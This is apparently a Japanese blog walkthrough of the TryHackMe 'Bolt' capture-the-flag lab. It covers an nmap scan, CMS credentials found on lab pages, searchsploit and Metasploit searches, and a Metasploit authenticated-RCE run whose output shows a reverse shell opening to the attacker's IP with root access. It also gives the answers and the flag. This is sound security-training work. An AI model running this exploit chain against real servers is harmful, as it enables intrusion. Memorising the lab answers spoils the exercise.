【TryHackMe】Bolt：Walkthrough

概要

TryHackMe「Bolt」のWalkthroughです。

Task2

Q1.What port number has a web server with a CMS running?

ポートスキャンを実行します。

$ nmap -Pn -sC -sV -A -p- 10.10.231.95 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 6fdaf3
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: d919f7
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service

ポートの稼働状況が分かりました。

ポート	サービス	バージョン
22	ssh	OpenSSH 7.6p1
80	http	Apache httpd 2.4.29
8000	http	PHP 7.2.32-1

8000番ポートでWebサイトにアクセスできました。

A.8000

Q2.What is the username we can find in the CMS?

/entry/message-from-adminページからJakeとboltというユーザー名を発見しました。

A.bolt

Q3.What is the password we can find for the username?

/entry/message-for-it-departmentページからパスワードがわかりました。

A.boltadmin123

Q4.What version of the CMS is installed on the server? (Ex: Name 1.1.1)

/boltパスへアクセスするとログイン画面が表示されると分かりました。

Username: bolt,Password: boltadmin123でログインします。

ログインに成功し、ダッシュボードのフッターからBolt CMSのバージョンを確認しました。

A.Bolt 3.7.1

Q5.There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?

searchsploitで検索すると3.7.0にRCEの脆弱性があると分かりました。

$ searchsploit bolt      
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow           | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                       | php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                              | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Execution                               | php/webapps/48296.py
Bolt CMS < 3.6.2 - Cross-Site Scripting                                            | php/webapps/46014.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                            | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion                                               | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                        | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                      | php/remote/38196.rb
----------------------------------------------------------------------------------- ---------------------------------

A.48296

Q6.Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)

Metasploitを起動し検索するとパスがわかりました。

$ msfconsole
msf6 > search bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/webapp/bolt_authenticated_rce  2020-05-07       great      Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution
   1  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability

A.exploit/unix/webapp/bolt_authenticated_rce

Q8.Look for flag.txt inside the machine.

ペイロードの設定を行います。

実行するとrootアカウントのシェルを取得できました。

msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "gjra".          
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file zfyrlybkfig.php.              
[+] Deleted file okuiyrzzq.php.                
[+] Used token a8a7ac14b217ff2d8d0d227757 to create huiserolkkz.php.
[*] Attempting to execute the payload via "/files/huiserolkkz.php?gjra=`payload`"                                    
[!] No response, may have executed a blocking payload!              
[*] Command shell session 1 opened (10.6.55.144:4444 -> 10.10.231.95:44432) at 2024-07-03 13:19:42 -0400             
[+] Deleted file huiserolkkz.php.
[+] Reverted user profile back to original state.
ls
index.html                                           
pwd                       
/home/bolt/public/files                      
whoami
root

/home/flag.txtからフラグを入手できます。

/home/flag.txt

THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

A.THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}